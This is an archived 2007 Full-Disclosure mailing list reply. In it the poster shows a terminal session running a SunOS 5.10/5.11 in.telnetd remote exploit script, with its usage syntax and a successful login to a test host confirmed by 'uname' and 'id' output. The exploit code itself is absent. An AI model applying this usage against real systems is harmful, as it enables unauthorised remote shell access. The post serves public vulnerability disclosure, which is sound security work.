lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Sun, 11 Feb 2007 11:15:21 +0100
From: Andrea Purificato - bunker <bunker@...twebnet.it>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: "0day was the case that they gave me"

Alle 07:00, domenica 11 febbraio 2007, Tyop? ha scritto:

> Ok. Someone have a Sol10?

(11:10) bunker@syn:~$ sh test.sh

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@....net
 ./sunos <host> <account>
 ./sunos localhost bin

(11:11) bunker@syn:~$ sh test.sh sparclab bunker

 SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@....net

 ALEX ALEX

 Trying 23.255.212.138...
 Connected to sparclab.
 Escape character is '^]'.
 Last login: Sun Feb 11 11:08:21 from syn
 Sun Microsystems Inc.   SunOS 5.11      snv_49  October 2007

(11:09) bunker@...rclab:~$ uname -a; id;
 SunOS sparclab 5.11 snv_49 sun4u sparc SUNW,Ultra-5_10
 uid=100(bunker) gid=1(other)

(11:09) bunker@...rclab:~$ exit
 logout
 Connection closed by foreign host.




Absolutely disarming!
-- 
Andrea "bunker" Purificato
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.

http://rawlab.mindcreations.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ